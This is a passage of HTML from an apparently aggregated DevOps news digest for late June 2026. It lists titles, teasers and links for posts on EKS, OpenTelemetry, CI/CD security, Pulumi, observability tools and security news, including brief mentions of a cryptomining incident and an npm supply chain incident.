          📄 Faster nodes, smarter scaling: What’s new inside Amazon Elastic Kubernetes Service (Amazon EKS) Auto Mode
        </a>
        </h3><p>In this post, we walk through the performance and scalability improvements we shipped across the four pillars of EKS Auto Mode: runtime, compute, storage, and networking.</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/faster-nodes-smarter-scaling-whats-new-inside-amazon-elastic-kubernetes-service-amazon-eks-auto-mode/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-innovation-s-curve-how-technology-matures-disrupts-and-why-your-next-platform-decision-matters-more-than-you-think" class="group relative scroll-mt-24">
        <a href="#h3-the-innovation-s-curve-how-technology-matures-disrupts-and-why-your-next-platform-decision-matters-more-than-you-think" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The innovation S-curve: How technology matures, disrupts, and why your next platform decision matters more than you think
        </a>
        </h3><p>Every technology—from the steam engine to the smartphone—follows a predictable arc: slow start, explosive ascent, then a plateau as physics or economics set in. This arc is the innovation S-curve, and</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/innovation-s-curve-how-technology-matures-disrupts-and-why-your-next-platform-decision-matters-more-you-think"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-eks-now-supports-control-plane-egress-through-your-vpc" class="group relative scroll-mt-24">
        <a href="#h3-amazon-eks-now-supports-control-plane-egress-through-your-vpc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EKS now supports control plane egress through your VPC
        </a>
        </h3><p>Today, we’re announcing customer-routed control plane egress, a new capability that you can use to route Kubernetes control plane traffic through your own Amazon Virtual Private Cloud (Amazon VPC). Th</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/amazon-eks-now-supports-control-plane-egress-through-your-vpc/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        </h2><h3 id="h3-otel-and-mesh-derived-metrics-a-2026-reference" class="group relative scroll-mt-24">
        <a href="#h3-otel-and-mesh-derived-metrics-a-2026-reference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OTel and mesh-derived metrics: A 2026 reference
        </a>
        </h3><p>If you already run an OpenTelemetry pipeline, you have good visibility into what your applications are doing. This blog post is about what you don’t see yet: the east-west traffic between your service</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/29/otel-and-mesh-derived-metrics-a-2026-reference/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hat-openshift-delivers-high-performance-llm-inference-for-financial-services" class="group relative scroll-mt-24">
        <a href="#h3-red-hat-openshift-delivers-high-performance-llm-inference-for-financial-services" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat OpenShift delivers high-performance LLM inference for financial services
        </a>
        </h3><p>The financial services industry, like many other sectors, is aiming to make best use of their hardware in the age of resource-intensive AI workloads. Financial services companies have come to rely on </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/red-hat-openshift-delivers-high-performance-llm-inference-financial-services"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-to-generate-an-sbom-for-container-workflows" class="group relative scroll-mt-24">
        <a href="#h3-how-to-generate-an-sbom-for-container-workflows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How to Generate an SBOM for Container Workflows
        </a>
        </h3><p>Learn when, where, and how to generate SBOMs for container images. Covers build-time vs. post-build approaches, quality criteria, and CI/CD integration.</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/sbom-generation-for-container-workflows/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-eu-cyber-resilience-act-overview-requirements-and-timelines" class="group relative scroll-mt-24">
        <a href="#h3-eu-cyber-resilience-act-overview-requirements-and-timelines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 EU Cyber Resilience Act: Overview, Requirements, and Timelines
        </a>
        </h3><p>Learn what the EU Cyber Resilience Act requires, including SBOM mandates, vulnerability reporting, and compliance deadlines for container teams.</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/eu-cyber-resilience-act-overview/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        </h2><h3 id="h3-github-and-undp-team-up-to-advance-development-priorities-in-ghana-with-open-source" class="group relative scroll-mt-24">
        <a href="#h3-github-and-undp-team-up-to-advance-development-priorities-in-ghana-with-open-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub and UNDP team up to advance development priorities in Ghana with open source
        </a>
        </h3><p>GitHub joined the United Nations Development Programme in Ghana to explore how open source governance can support one of West Africa&#39;s most ambitious digital reform efforts.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/social-impact/github-and-undp-team-up-to-advance-development-priorities-in-ghana-with-open-source/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-coding-agents-are-pulling-ci-feedback-into-the-inner-loop" class="group relative scroll-mt-24">
        <a href="#h3-ai-coding-agents-are-pulling-ci-feedback-into-the-inner-loop" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Coding Agents Are Pulling CI Feedback Into the Inner Loop
        </a>
        </h3><p>The traditional shape of CI/CD assumed humans worked in the inner loop and pipelines policed the outer one. AI coding agents are tearing that geometry apart. When code can be generated in seconds, wai</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-coding-agents-are-pulling-ci-feedback-into-the-inner-loop/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-transitioning-as-a-hubber" class="group relative scroll-mt-24">
        <a href="#h3-transitioning-as-a-hubber" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Transitioning as a Hubber
        </a>
        </h3><p>How GitHub&#39;s culture and benefits helped me be the best version of myself.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/developer-skills/career-growth/transitioning-as-a-hubber/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-cicd-for-an-open-source-project-part-3-credentials-verification-and-whats-next" class="group relative scroll-mt-24">
        <a href="#h3-securing-cicd-for-an-open-source-project-part-3-credentials-verification-and-whats-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing CI/CD for an open source project, part 3: Credentials, verification, and what’s next
        </a>
        </h3><p>This is the third and final post in a series on how Cilium hardens its CI/CD pipeline. Part 1 covered access control and Part 2 covered dependency hardening. This post covers the last layer: keeping C</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/26/securing-ci-cd-for-an-open-source-project-part-3-credentials-verification-and-whats-next/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-evaluating-performance-and-efficiency-of-the-github-copilot-agentic-harness-across-models-and-tasks" class="group relative scroll-mt-24">
        <a href="#h3-evaluating-performance-and-efficiency-of-the-github-copilot-agentic-harness-across-models-and-tasks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Evaluating performance and efficiency of the GitHub Copilot agentic harness across models and tasks
        </a>
        </h3><p>Explore how the GitHub Copilot agentic harness delivers strong results across multiple benchmarks and leading token efficiency, while maintaining flexibility to choose among more than 20 models.</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/evaluating-performance-and-efficiency-of-the-github-copilot-agentic-harness-across-models-and-tasks/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-warehouse-native-experimentation-comes-to-bigquery-databricks-and-redshift" class="group relative scroll-mt-24">
        <a href="#h3-warehouse-native-experimentation-comes-to-bigquery-databricks-and-redshift" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Warehouse-native experimentation comes to BigQuery, Databricks, and Redshift
        </a>
        </h3><p>Analyze your experiments on the same trusted data your business already runs on, so results never come with an asterisk.</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/warehouse-native-experimentation-comes-to-bigquery-databricks-and-redshift/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-google-antigravity-agents-get-full-context-with-gitlab-orbit" class="group relative scroll-mt-24">
        <a href="#h3-google-antigravity-agents-get-full-context-with-gitlab-orbit" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Google Antigravity agents get full context with GitLab Orbit
        </a>
        </h3><p>Developers working in Google Antigravity can now install our lifecycle context graph, GitLab Orbit, directly from the Antigravity MCP Store and give their agents structured access to projects, pipelin</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/gitlab-orbit-and-google-antigravity/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-1911-1903-18116" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-1911-1903-18116" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 19.1.1, 19.0.3, 18.11.6
        </a>
        </h3><p><strong>📅 Jun 24, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-1-1-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-i-automated-my-job-and-it-made-me-a-better-leader" class="group relative scroll-mt-24">
        <a href="#h3-i-automated-my-job-and-it-made-me-a-better-leader" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 I automated my job (and it made me a better leader)
        </a>
        </h3><p>Explore how my day as a senior leader looks now that I use 40 automations to help, and learn more about some of my favorites.</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/developer-skills/github/i-automated-my-job-and-it-made-me-a-better-leader/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        </h2><h3 id="h3-introducing-esc-secret-rotation-webhooks" class="group relative scroll-mt-24">
        <a href="#h3-introducing-esc-secret-rotation-webhooks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing ESC Secret Rotation Webhooks
        </a>
        </h3><p>Pulumi ESC centralizes your secrets and configuration, and it can automatically rotate secrets on a schedule so credentials never go stale. But a rotation is only useful if the systems that depend on </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/introducing-esc-secret-rotation-webhooks/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-govern-privileged-workload-boundaries-with-red-hat-openshift-ansible-automation-platform-and-identity-management" class="group relative scroll-mt-24">
        <a href="#h3-govern-privileged-workload-boundaries-with-red-hat-openshift-ansible-automation-platform-and-identity-management" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Govern privileged workload boundaries with Red Hat OpenShift, Ansible Automation Platform, and Identity Management
        </a>
        </h3><p>Platform engineering, security architecture, and operations teams are being asked to support 2 realities at once: modern application platforms such as Red Hat OpenShift, and long-lived Red Hat Enterpr</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/govern-privileged-workload-boundaries-red-hat-openshift-ansible-automation-platform-and-identity-management"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-a-governed-databricks-workspace-with-pulumi" class="group relative scroll-mt-24">
        <a href="#h3-build-a-governed-databricks-workspace-with-pulumi" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build a Governed Databricks Workspace with Pulumi
        </a>
        </h3><p>Platform teams responsible for Databricks often find themselves manually configuring clusters and notebooks for every new data science team. This manual overhead leads to inconsistent cluster policies</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/end-to-end-databricks-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-deploy-a-private-hermes-agent-on-render-securely-with-pulumi-modal-and-tailscale" class="group relative scroll-mt-24">
        <a href="#h3-deploy-a-private-hermes-agent-on-render-securely-with-pulumi-modal-and-tailscale" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Deploy a Private Hermes Agent on Render Securely with Pulumi, Modal, and Tailscale
        </a>
        </h3><p>Personal AI agents had their breakout this year. OpenClaw crossed 100,000 GitHub stars within months of launching, and self-hosting your own assistant went from a hobbyist trick to something a lot of </p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/deploy-a-hermes-agent-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloudflare-first-networking-as-code-with-pulumi" class="group relative scroll-mt-24">
        <a href="#h3-cloudflare-first-networking-as-code-with-pulumi" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cloudflare-First Networking as Code with Pulumi
        </a>
        </h3><p>Platform teams managing multi-cloud applications face a dangerous visibility gap. While origin infrastructure is tightly controlled, the edge configuration often drifts through manual console tweaks. </p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/cloudflare-first-networking-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        </h2><h3 id="h3-from-query-to-action-introducing-sql-alerting-in-cloud-monitoring-observability-analytics" class="group relative scroll-mt-24">
        <a href="#h3-from-query-to-action-introducing-sql-alerting-in-cloud-monitoring-observability-analytics" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From query to action: Introducing SQL alerting in Cloud Monitoring Observability Analytics
        </a>
        </h3><p>Traditional alerting systems often force a compromise: you can either alert immediately on simple, noisy log events, or monitor rigid, pre-configured metrics that fail when faced with data with many u</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/management-tools/alert-with-sql-in-cloud-monitoring-observability-analytics/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-top-sentry-alternatives-to-improve-error-management-and-system-insights" class="group relative scroll-mt-24">
        <a href="#h3-top-sentry-alternatives-to-improve-error-management-and-system-insights" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Top Sentry Alternatives to Improve Error Management And System Insights
        </a>
        </h3><p>Explore the best Sentry alternatives that unify error tracking, logs, and metrics to improve incident response and reduce alert fatigue for engineering teams.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/sentry-alternatives"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-celebrating-pride-and-community-across-our-global-teams" class="group relative scroll-mt-24">
        <a href="#h3-celebrating-pride-and-community-across-our-global-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Celebrating Pride and Community Across Our Global Teams
        </a>
        </h3><p>Explore how New Relic drives LGBTQIA+ inclusion through global community impact and a perfect Human Rights Campaign score.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/celebrating-pride-and-community"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fluent-package-v604-has-been-released" class="group relative scroll-mt-24">
        <a href="#h3-fluent-package-v604-has-been-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 fluent-package v6.0.4 has been released
        </a>
        </h3><p>Hi users! We have released fluent-package v6.0.4 on 2026-06-26. Fluent Package is a stable distribution package of Fluentd. (successor of td-agent) This is a maintenance release of v6.0.x LTS series. </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Fluentd Blog</strong></p>
<p><a href="https://www.fluentd.org/blog/fluent-package-v6.0.4-has-been-released"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-grafana-131-release-observability-as-code-updates-extending-grafana-assistant-across-more-data-sources-and-more" class="group relative scroll-mt-24">
        <a href="#h3-grafana-131-release-observability-as-code-updates-extending-grafana-assistant-across-more-data-sources-and-more" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Grafana 13.1 release: observability as code updates, extending Grafana Assistant across more data sources, and more
        </a>
        </h3><p>Earlier this year, Grafana 13 laid the groundwork for making it easier and faster than ever to turn your data into actionable insights. With our latest minor release, Grafana 13.1, we&#39;re building on t</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Grafana Blog</strong></p>
<p><a href="https://grafana.com/blog/grafana-13-1-release-all-the-latest-features/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dont-wrap-opentelemetry-youre-probably-hurting-more-than-helping" class="group relative scroll-mt-24">
        <a href="#h3-dont-wrap-opentelemetry-youre-probably-hurting-more-than-helping" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Don't Wrap OpenTelemetry — You're Probably Hurting More Than Helping
        </a>
        </h3><p>There’s a pattern I’ve seen across many teams adopting OpenTelemetry, and it’s well-intentioned every single time. An engineer wants to make things easier for the team. They build a thin abstraction o</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/dont-wrap-opentelemetry/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-post-incident-review-for-tanstack-npm-supply-chain-ransom-incident-no-unauthorized-access-to-customer-production-systems" class="group relative scroll-mt-24">
        <a href="#h3-post-incident-review-for-tanstack-npm-supply-chain-ransom-incident-no-unauthorized-access-to-customer-production-systems" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Post-incident review for TanStack npm supply chain ransom incident: No unauthorized access to customer production systems
        </a>
        </h3><p>On May 27, we completed our internal investigation of the recent TanStack supply chain ransom incident and confirmed our initial findings: The incident was strictly limited to Grafana Labs&#39; GitHub env</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Grafana Blog</strong></p>
<p><a href="https://grafana.com/blog/post-incident-review-for-tanstack-npm-supply-chain-ransom-incident/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-new-relic-preflight-for-ai-coding-observability" class="group relative scroll-mt-24">
        <a href="#h3-introducing-new-relic-preflight-for-ai-coding-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing New Relic Preflight for AI Coding Observability
        </a>
        </h3><p>Understand where your AI spends time, catch problems before they compound, and keep your workflow moving.</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/introducing-ai-coding-observability"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-and-running-custom-code-transformations-without-leaving-your-editor" class="group relative scroll-mt-24">
        <a href="#h3-building-and-running-custom-code-transformations-without-leaving-your-editor" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building and running custom code transformations without leaving your editor
        </a>
        </h3><p>Custom code transformations are the work that no off-the-shelf migrator covers for you. Moving your services off an internal library, enforcing your team’s error-handling conventions, standardizing lo</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/building-and-running-custom-code-transformations-without-leaving-your-editor/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-snyk-vulnbench-js-10-can-llms-find-the-same-bugs-twice" class="group relative scroll-mt-24">
        <a href="#h3-snyk-vulnbench-js-10-can-llms-find-the-same-bugs-twice" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Snyk VulnBench JS 1.0: Can LLMs Find the Same Bugs Twice?
        </a>
        </h3><p>Snyk VulnBench JS 1.0: 300 repeated scans show LLM security findings vary by run, while SAST and models catch different vulnerability gaps.</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/snyk-vulnbench-js-1-0-llm-security-review-repeatability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-does-eu-ai-act-compliance-require" class="group relative scroll-mt-24">
        <a href="#h3-what-does-eu-ai-act-compliance-require" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What Does EU AI Act Compliance Require?
        </a>
        </h3><p>Learn what EU AI Act compliance requires at each risk tier, key deadlines through 2027, and how engineering teams can operationalize AI governance.</p>
<p><strong>📅 Jun 27, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/eu-ai-act-compliance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-phishing-to-vishing-why-devsecops-must-rethink-communication-security" class="group relative scroll-mt-24">
        <a href="#h3-from-phishing-to-vishing-why-devsecops-must-rethink-communication-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Phishing to Vishing: Why DevSecOps Must Rethink Communication Security
        </a>
        </h3><p>Key Takeaways: Vishing is the new frontline threat: Attackers are shifting from emails to phone-based scams, using AI and social engineering to bypass traditional security controls. DevSecOps must exp</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/from-phishing-to-vishing-why-devsecops-must-rethink-communication-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-june-26-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-june-26-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — June 26, 2026
        </a>
        </h3><p>IBM, Red Hat and Palo Alto Networks Expand Project Lightwell to Help Organizations Respond to Software Vulnerabilities. Red Hat, IBM, and Palo Alto Networks have expanded Project Lightwell to combat AI-</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-june-26-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-empower-your-ai-tools-with-new-agent-skills-for-red-hat-enterprise-linux" class="group relative scroll-mt-24">
        <a href="#h3-empower-your-ai-tools-with-new-agent-skills-for-red-hat-enterprise-linux" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Empower your AI tools with new agent skills for Red Hat Enterprise Linux
        </a>
        </h3><p>AI tools are transforming how system administrators and developers manage their infrastructure, but when using generic AI assistants to troubleshoot Red Hat Enterprise Linux (RHEL) systems, the advice</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/empower-your-ai-tools-new-agent-skills-red-hat-enterprise-linux"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-openai-gpt-openai-gpt-oss-and-nvidia-nemotron-models-on-amazon-bedrock-receive-fedramp-high-and-dod-il-45-approval-in-aws-govcloud-us" class="group relative scroll-mt-24">
        <a href="#h3-openai-gpt-openai-gpt-oss-and-nvidia-nemotron-models-on-amazon-bedrock-receive-fedramp-high-and-dod-il-45-approval-in-aws-govcloud-us" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenAI GPT, OpenAI GPT OSS, and NVIDIA Nemotron models on Amazon Bedrock receive FedRAMP High and DoD IL-4/5 approval in AWS GovCloud (US)
        </a>
        </h3><p>OpenAI GPT, OpenAI GPT OSS, and NVIDIA Nemotron models are now FedRAMP High and Department of Defense Cloud Computing Security Requirements Guide (DoD CC SRG) Impact Level (IL) 4 and 5 approved within</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/addl-bedrock-model-fedramp-il-5-govcloud"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-nvd-in-the-ai-era-the-case-for-multi-source-vulnerability-intelligence" class="group relative scroll-mt-24">
        <a href="#h3-nvd-in-the-ai-era-the-case-for-multi-source-vulnerability-intelligence" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 NVD in the AI Era: The Case for Multi-Source Vulnerability Intelligence
        </a>
        </h3><p>NIST’s shift to risk-based enrichment makes one thing clear: modern security teams need more than a single public source. In the AI era, trusted vulnerability intelligence depends on multiple signals,</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/nvd-multi-source-vulnerability-intelligence/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-alert-fatigue-to-automated-action-automated-patching-in-the-ai-era" class="group relative scroll-mt-24">
        <a href="#h3-from-alert-fatigue-to-automated-action-automated-patching-in-the-ai-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From alert fatigue to automated action: Automated patching in the AI era
        </a>
        </h3><p>AI models are outpacing human-scale security operations. AI can surface vulnerabilities across major systems faster than teams can act, and most organizations lack the patching capacity to keep up. Th</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/alert-fatigue-automated-action-automated-patching-ai-era"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fluentd-v1193-has-been-released" class="group relative scroll-mt-24">
        <a href="#h3-fluentd-v1193-has-been-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fluentd v1.19.3 has been released
        </a>
        </h3><p>Hi users! We have released v1.19.3 on 2026-06-25. ChangeLog is here. This release is a maintenance release of v1.19 series. This release is bundled for fluent-package LTS version v6.0.4! Security Fixe</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Fluentd Blog</strong></p>
<p><a href="https://www.fluentd.org/blog/fluentd-v1.19.3-has-been-released"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-note-to-our-customers-and-partners" class="group relative scroll-mt-24">
        <a href="#h3-a-note-to-our-customers-and-partners" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A Note to Our Customers and Partners
        </a>
        </h3><p>A note to our customers and partners about Snyk&#39;s AI transformation and organizational changes.</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/a-note-to-our-customers-and-partners/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-an-sbom-and-why-cant-you-ship-without-one" class="group relative scroll-mt-24">
